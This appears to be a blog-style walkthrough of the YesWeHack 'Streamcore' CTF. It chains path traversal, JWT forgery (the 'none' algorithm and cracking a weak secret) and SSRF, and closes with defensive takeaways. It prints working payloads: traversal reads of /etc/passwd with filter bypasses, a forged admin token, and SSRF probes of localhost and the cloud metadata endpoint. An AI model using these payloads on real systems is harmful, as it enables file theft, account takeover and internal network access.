Unlocking the Streamcore CTF: A Masterclass in Chaining Path Traversal, JWT Hardening, and SSRF for Web Exploitation + Video

By /

Listen to this Post

Featured Image

Introduction:

The YesWeHack Dojo’s latest Capture The Flag (CTF) challenge, “Streamcore,” simulates a video streaming service with a seemingly simple interface. However, beneath the surface lies a complex web of vulnerabilities requiring an attacker to chain multiple flaws—improper token handling and insecure file-loading mechanisms—to access restricted resources. This article dissects the technical path to compromise, providing a hands-on guide to identifying and exploiting these weaknesses while teaching essential defensive strategies for modern web applications【1†L1-L4】.

Learning Objectives:

  • Objective 1: Understand and exploit Path Traversal vulnerabilities in file-loading functionalities.
  • Objective 2: Analyze and forge JSON Web Tokens (JWTs) by exploiting weak signing algorithms (e.g., `none` algorithm) or brute-forcing weak secrets.
  • Objective 3: Master Server-Side Request Forgery (SSRF) attacks to pivot from a video stream processor to internal network services.

You Should Know:

  1. Mapping the Attack Surface: From Video Player to Local File Disclosure

The CTF presents a video streaming service that loads media files using a parameter in the URL, such as `https://streamcore.ctf/load?file=video.mp4`. The first critical step is testing for a Path Traversal vulnerability, which allows an attacker to read arbitrary files from the server’s filesystem.

Understanding the Vulnerability:

If the application does not properly sanitize the `file` parameter, an attacker can use sequences like `../` (dot-dot-slash) to move up directories and access sensitive files, such as the application’s source code or configuration files. For example:

https://streamcore.ctf/load?file=../../../../etc/passwd
https://streamcore.ctf/load?file=....//....//....//etc/passwd // Bypass basic filters

On Windows systems, similar sequences like `..\` or using encoded representations (%2e%2e%2f) may be required.

Step‑by‑Step Exploitation Guide:

  1. Identify the File-Loading Endpoint: Intercept the request when loading a video using a proxy like Burp Suite or OWASP ZAP. Look for parameters named file, path, document, load, or stream.
  2. Inject Path Traversal Payloads: Send crafted payloads to the endpoint to read the application’s source code, typically app.js, index.php, or server.py. 
    Linux/macOS Payload
curl -k "https://streamcore.ctf/load?file=../../../../app.py"

Windows Payload (if server is Windows-based)
curl -k "https://streamcore.ctf/load?file=..\..\..\..\Windows\win.ini"

  3. Bypass Common Defenses: If simple traversal is blocked, try:

– URL Encoding: `%2e%2e%2f` for `../`
– Double URL Encoding: `%252e%252e%252f`
– Absolute Paths: `file:///etc/passwd`
– Null Byte Injection (legacy): `../../../etc/passwd%00.jpg`
4. Analyze the Leaked Source Code: After successfully reading a file like `server.py` or auth.js, search for hardcoded credentials, API keys, or—most critically—the token generation logic. This often reveals how the application creates and validates JWTs.

In the Streamcore CTF, this initial traversal exposes the token generation mechanism, showing that the server uses a weak, guessable secret for its JWTs【1†L2-L4】.

  1. Breaking the Bearer: JWT Algorithm Confusion and Secret Brute-Forcing

Once the source code is obtained, the next phase involves manipulating the JSON Web Token (JWT) used for authentication or authorization. A common misconfiguration is accepting the `none` algorithm or using a weak HMAC secret.

Step‑by‑Step JWT Exploitation Guide:

  1. Extract and Decode the JWT: Locate the token from the `Authorization` header or a cookie. Use `jwt_tool` or the online debugger (jwt.io) to decode its payload. 
    Using jwt_tool to decode and analyze a token
python3 jwt_tool.py <JWT_TOKEN>
  2. Check for the `none` Algorithm Vulnerability: Tamper with the token’s header, changing the `alg` field to `none` and removing the signature part. This tricks the server into accepting the modified token. 
    Python snippet to create a 'none' algorithm token
import jwt
token = jwt.encode({"user":"admin", "role":"admin"}, key='', algorithm='none')
print(token)
  3. Brute-Force a Weak HMAC Secret: If the algorithm is HS256, use a tool like `hashcat` or `john` to crack the secret from a valid token-signature pair. 
    Using jwt_tool to brute-force the secret with a wordlist
python3 jwt_tool.py <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
  4. Forge an Administrative Token: Once you have the secret or confirm the `none` vulnerability, craft a new token with elevated privileges (e.g., changing the role to admin). Send this forged token in a new request to access an internal administrative endpoint, such as /admin/debug, disclosed in the leaked source code.

This forged token in Streamcore opens access to an internal service that was previously unreachable, setting the stage for the final exploitation phase【1†L2-L4】.

  1. Pivoting with SSRF: Streaming Your Way to Internal Endpoints

With an admin JWT, the CTF reveals a new function: a `stream_debug` endpoint that allows the user to provide a URL for the server to fetch and process. This is a classic Server-Side Request Forgery (SSRF) vulnerability. The goal is to abuse this privileged service to interact with internal infrastructure.

Step‑by‑Step SSRF Exploitation Guide:

  1. Locate the SSRF Primitives: After authentication with the forged token, navigate to functions like “Import from URL,” “Fetch Metadata,” or any feature that instructs the server to download a resource from a user-supplied address.
  2. Probe the Internal Network: Start by having the server fetch a URL you control to confirm connectivity (e.g., your `https://your-server.com/callback`). Then, scan for internal IP addresses and ports. 
    Common internal addresses to test for SSRF
http://127.0.0.1:80
http://127.0.0.1:8080
http://169.254.169.254/latest/meta-data/  Cloud metadata
http://192.168.1.1/config
  3. Bypass Allowlist Restrictions: If the server uses a basic allowlist, bypass it using techniques like:

– Redirects: Host a server that redirects to `http://127.0.0.1/admin`.
– DNS Rebinding: Point a domain to a public IP, then switch to an internal IP.
– Alternative Representations: Use `http://0.0.0.0` or http://localhost` instead of127.0.0.1.
- URL Parser Inconsistencies: Tryhttp://2130706433/` (decimal for 127.0.0.1).
4. Read the Flag: The internal service the CTF protects is likely a simple HTTP server on `localhost:8080` that requires a specific `X-Internal-API-Key` header. The forged JWT might have already granted you that key. Use the SSRF to request the flag endpoint.

 Example SSRF payload targeting an internal API that returns the flag
POST /stream_debug HTTP/1.1
Host: streamcore.ctf
Authorization: Bearer <FORGED_ADMIN_JWT>
Content-Type: application/json

{"url": "http://127.0.0.1:8080/admin/flag"}

By successfully chaining the path traversal, JWT attack, and SSRF, the flag is exfiltrated via the server’s own request to itself, completely bypassing external access controls.

What Undercode Say:

  • Key Takeaway 1: Modern CTF chains are not about single, isolated bugs but about the creative interconnection of multiple small misconfigurations, each acting as a link in a larger kill chain.
  • Key Takeaway 2: Defenders must adopt “assume breach” mentality and implement defense-in-depth; a path traversal bug should not lead to a JWT secret, and an SSRF primitive should never be placed in an admin-only function without rigorous allowlisting and network segmentation.

Analysis: This CTF brilliantly mirrors real-world attack paths observed in complex web applications. The progression from information disclosure (path traversal) to privilege escalation (JWT manipulation) to internal network pivoting (SSRF) is a textbook example of how seemingly low-severity issues accumulate into a critical compromise. The ultimate lesson is that each layer of security must be independent. Using a weak JWT secret nullifies authentication, and exposing internal debugging functions behind a compromised token nullifies network isolation. This demonstrates a core principle: isolation and secrets are only as strong as the weakest link in their implementation chain.

Prediction:

  • -1 As AI-assisted coding becomes mainstream, the prevalence of hardcoded secrets and weak algorithm support in JWT libraries may temporarily increase, as developers rely on auto-complete without security context, leading to a resurgence of these specific vulnerability chains.
  • +1 The growing maturity of automated API security testing tools (e.g., Burp Suite’s BChecks, custom Nuclei templates) will soon make the detection of complex, multi-stage chains like “Path Traversal -> JWT Weakness -> SSRF” a standard CI/CD gate, drastically reducing their presence in production environments.

▶️ Related Video (74% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: New Ctf – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: